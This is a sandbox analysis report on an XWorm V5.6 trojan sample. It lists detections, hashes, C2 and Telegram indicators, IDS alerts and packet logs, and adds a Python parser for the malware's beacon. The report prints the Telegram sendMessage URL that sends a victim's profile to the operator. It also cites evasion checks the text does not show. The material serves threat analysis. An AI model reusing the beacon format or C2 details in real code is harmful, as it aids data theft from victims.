Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

Antivirus detection (initial sample)
Source | Detection | Scanner | Label
XClient.exe | 76% | ReversingLabs | Win32.Exploit.Xworm
XClient.exe | 100% | Avira | TR/Spy.Gen
XClient.exe | 100% | Joe Sandbox ML |

Dropped files, unpacked PE files, domains: No Antivirus matches

Antivirus detection (URLs)
Source | Detection | Scanner | Label
144.48.105.119 | 0% | Avira URL Cloud | safe

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/botYour_Token/sendMessage?chat_id=6170564111&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | false | | high
144.48.105.119 | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot | XClient.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | XClient.exe, 00000000.00000002.2402286197.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
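
The Telegram sendMessage URL listed above is the RAT's first-contact notification, with the victim profile URL-encoded into its text parameter. The Python below is an added example for this page, not code from the Joe Sandbox report or from XWorm: it splits that URL into bot token, chat_id and the decoded message fields so the beacon can be read as an IOC record and compared with the evasion checks earlier in the report (the GPU string it carries is consistent with the Win32_VideoController queries listed there, and "CPU : Error" shows that lookup failed in the sandbox). The field labels, including the sample's own misspellings "Clinet" and "Groub", are taken from the URL as shown; the parsing rules, the placeholder-token check and the returned dictionary layout are this example's. Note that the token path segment is the literal Your_Token, a placeholder rather than a real bot token, so the Telegram API would reject this request even though the sandbox recorded the attempt.

```python
"""Decode an XWorm-style Telegram sendMessage beacon URL into fields.

Added example, not part of the Joe Sandbox report or of the XWorm sample.
BEACON_URL is the URL shown in this report; field names come from the
message itself (including the sample's own spelling), while the parsing
rules, the placeholder check and the dictionary layout are assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

BEACON_URL = (
    "https://api.telegram.org/botYour_Token/sendMessage?chat_id=6170564111"
    "&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A"
    "7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20"
    "Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error"
    "%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6"
)

# Assumption: anything without the "<bot id>:<secret>" shape, or equal to the
# builder's default string seen in this report, is not a usable bot token.
PLACEHOLDER_TOKENS = {"Your_Token"}


def _split_fields(text):
    """Turn the CRLF-separated 'Key : value' body into (banner, dict).

    A key with an empty value (the 'New Clinet :' line) takes the next
    non-empty line as its value; that is how the sample lays out the id.
    """
    lines = [line.strip() for line in text.split("\r\n")]
    fields = {}
    i = 1  # line 0 is the banner, e.g. "<skull> [XWorm V5.6]"
    while i < len(lines):
        line = lines[i]
        if " : " in line or line.endswith(" :"):
            key, _, value = line.partition(" :")
            value = value.strip()
            if not value:
                i += 1
                while i < len(lines) and not lines[i]:
                    i += 1
                value = lines[i] if i < len(lines) else ""
            fields[key.strip()] = value
        i += 1
    return lines[0] if lines else "", fields


def parse_beacon(url):
    """Return host, method, token, chat_id, banner, family and profile fields."""
    parts = urlsplit(url)
    segments = parts.path.split("/")  # ['', 'bot<token>', 'sendMessage']
    if len(segments) < 3 or not segments[1].startswith("bot"):
        raise ValueError("not a Telegram Bot API URL")
    token = segments[1][len("bot"):]
    query = parse_qs(parts.query)  # parse_qs already %-decodes the values
    banner, fields = _split_fields(query.get("text", [""])[0])
    m = re.search(r"\[([^\]]+)\]", banner)
    return {
        "host": parts.hostname,
        "method": segments[2],
        "token": token,
        "token_is_placeholder": token in PLACEHOLDER_TOKENS or ":" not in token,
        "chat_id": query.get("chat_id", [""])[0],
        "banner": banner,
        "family": m.group(1) if m else None,
        "fields": fields,
    }


def ioc_summary(beacon):
    """One-line summary of the beacon for an IOC note."""
    f = beacon["fields"]
    return (f"{beacon['family']} client {f.get('New Clinet')} on {f.get('OSFullName')} "
            f"as {f.get('UserName')}, group {f.get('Groub')}, chat_id {beacon['chat_id']}")


if __name__ == "__main__":
    b = parse_beacon(BEACON_URL)
    print(ioc_summary(b))
    for key, value in b["fields"].items():
        print(f"  {key}: {value}")
```

The chat_id is the stable part of this beacon: the token string is a placeholder here, but the chat_id and the "New Clinet" id are what the operator keyed the build on, so they are the values worth carrying into a watchlist.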

Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
144.48.105.119 | unknown | Singapore | 63018 | DEDICATEDUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582524
Start date and time: 2024-12-30 20:13:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XClient.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/0@1/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 12
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 184.28.90.27
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target XClient.exe, PID 4992 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: XClient.exe
Time | Type | Description
14:13:41 | API Interceptor | 6442370x Sleep call for process: XClient.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer
 | iviewers.dll | malicious | LummaC
 | Flasher.exe | malicious | Luca Stealer, Rusty Stealer
 | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar
 | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer
 | cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine
 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
 | Proforma Invoice.exe | malicious | MassLogger RAT
 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
 | tg.exe | malicious | Babadeda
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
 | iviewers.dll | malicious | LummaC | 149.154.167.220
 | Flasher.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220
 | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Proforma Invoice.exe | malicious | MassLogger RAT | 149.154.167.220
 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | tg.exe | malicious | Babadeda | 149.154.167.220
 | tg.exe | malicious | Babadeda | 149.154.167.220
 | setup.exe | malicious | Babadeda | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | BHgwhz3lGN.exe | malicious | Vidar | 149.154.167.99
 | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
 | Tool_Unlock_v1.2.exe | malicious | Vidar | 149.154.167.99
 | iviewers.dll | malicious | LummaC | 149.154.167.220
 | Flasher.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220
 | JA7cOAGHym.exe | malicious | Vidar | 149.154.167.99
 | https://linkenbio.net/59125/247 | malicious | Unknown | 149.154.167.99
 | aD7D9fkpII.exe | malicious | Vidar | 149.154.167.99
 | installer.bat | malicious | Vidar | 149.154.167.99
 | skript.bat | malicious | Vidar | 149.154.167.99
DEDICATEDUS | arm.nn.elf | malicious | Mirai, Okiru | 38.87.151.159
 | TRC.arm7.elf | malicious | Mirai | 74.201.216.32
 | meow.arm.elf | malicious | Unknown | 194.26.25.141
 | meow.arm5.elf | malicious | Unknown | 194.26.25.7
 | la.bot.arm-20241006-1050.elf | malicious | Unknown | 200.220.163.218
 | 2.exe | malicious | AsyncRAT | 216.105.171.163
 | dKMlbDZXP3.elf | malicious | Mirai | 216.52.183.163
 | build.hta | malicious | Quasar | 64.42.179.59
 | build.exe | malicious | Quasar | 64.42.179.59
 | Replace.exe | malicious | Unknown | 74.201.73.52
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | hoEtvOOrYH.exe | malicious | SmokeLoader | 149.154.167.220
 | web44.mp4.hta | malicious | LummaC | 149.154.167.220
 | random.exe | malicious | LummaC | 149.154.167.220
 | eXbhgU9.exe | malicious | LummaC | 149.154.167.220
 | Supplier.bat | malicious | Unknown | 149.154.167.220
 | Supplier.bat | malicious | LodaRAT, XRed | 149.154.167.220
 | NEW-DRAWING-SHEET.bat | malicious | Unknown | 149.154.167.220
 | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
 | lumma.ps1 | malicious | LummaC | 149.154.167.220
                                              No context
                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.598050581972324
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: XClient.exe
File size: 40'960 bytes
MD5: ca1b3f03551f41b8c83217c3af2b0d3c
SHA1: 7cebd14139aad3b194080a7210c78a6587de1de5
SHA256: e62ef733237ababe82f6b2109c70159744994515bc941b8ed025de10bb8aa624
SHA512: c2044ae1a0b76c02ac8952fd205cbcf3ff1a9dbb491af1e9a18d7b212bdedd7d22fda7e3ba8b081b1279ae7d6e8951c2008eb79c9227a0c5f6a98c209c9ac10b
SSDEEP: 768:I7tEWUj10f2kgAWMLxOc2O5Ft9jwO+hdFuk:aKjPIV2wFt9jwO+3Ek
TLSH: A0034C04B7E14626DAEE6BF019F366060630E617DD17EB8E1CD499DA1B3BA80CD413E6
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.rg................................. ........@.. ....................................@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x40b50e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6772CD6F [Mon Dec 30 16:42:23 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb4b8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9514 | 0x9600 | 5764ca3132be3244f35079ef92569dc4 | False | 0.49747395833333335 | data | 5.719926020626053 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4d8 | 0x600 | 2472af5ddbb53779b7381f16b8b9407b | False | 0.3756510416666667 | data | 3.7216503306685733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | e4691ef7dae40ff5e0b74653525043d4 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x244 | data | | | 0.4724137931034483
RT_MANIFEST | 0xc2e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T20:13:41.777567+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.16 | 49702 | 149.154.167.220 | 443 | TCP
2024-12-30T20:13:41.777567+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.16 | 49702 | 149.154.167.220 | 443 | TCP
2024-12-30T20:14:59.749315+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.16 | 49733 | 144.48.105.119 | 7000 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 30, 2024 20:14:11.221532106 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:11.221631050 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:11.237302065 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:11.242134094 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:12.856436968 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:12.856658936 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.776381969 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.777482033 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.781394005 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:16.782377005 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:16.782468081 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.799046040 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.803841114 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:18.341010094 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:18.341170073 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.434417009 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.435575962 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.439467907 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:20.440432072 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:20.440524101 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.455895901 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.460700035 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:21.993482113 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:21.993593931 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.847409010 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.848387003 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.852339029 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:22.853358984 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:22.853456974 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.868463993 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.873266935 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:24.417490005 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:24.417706966 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.276384115 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.277167082 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.281523943 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:26.282035112 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:26.282124043 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.296772957 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.301681995 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:27.839638948 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:27.839735031 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.914414883 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.915575027 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.919363976 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:28.920500994 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:28.920594931 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.935609102 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.940433025 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:30.479022980 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:30.479135990 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.135540962 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.136390924 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.141670942 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:31.143775940 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:31.143873930 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.157807112 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.162667990 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.696366072 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.696432114 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.920411110 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.921252966 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.925323963 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.926135063 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.926230907 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.940151930 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.945009947 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:34.511468887 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:34.511548042 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.093411922 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.094355106 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.098423958 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:35.099220037 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:35.099297047 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.112306118 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.117207050 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:36.775485039 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:36.775569916 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.301428080 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.302191973 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.306344032 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:37.307105064 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:37.307188034 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.321789980 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.326611042 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:38.858503103 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:38.858580112 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.474515915 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.475229979 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.479537010 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:39.480074883 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:39.480165958 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.495151997 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.500082970 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.027615070 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.027694941 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.120405912 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.121459007 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.125233889 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.126382113 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.126462936 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.139780045 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.144637108 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.665252924 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.665429115 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.686512947 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.687299013 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.691345930 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.692167997 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.692260027 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.709459066 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.714360952 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:44.242203951 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:44.242296934 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:48.982522964 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:48.984756947 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:48.987730980 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:48.989849091 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:48.989923000 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.006444931 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.011411905 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.051316023 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.056278944 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.062597036 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.067517042 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.094571114 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.099431992 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.110528946 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.115351915 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.126528978 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.131373882 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.142543077 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.147351027 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.174532890 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.179307938 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.399318933 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.608829975 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:50.635099888 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:50.635174036 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.398488998 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.399661064 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.403538942 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.404541969 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.404633999 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.419476032 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.424274921 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.430996895 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.436326981 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.461621046 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.466521978 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.477705956 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.482537031 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.525624037 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.531038046 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.541559935 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.546438932 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.573584080 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.578408957 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.589576960 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.594436884 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.605561972 CET497327000192.168.2.16144.48.105.119
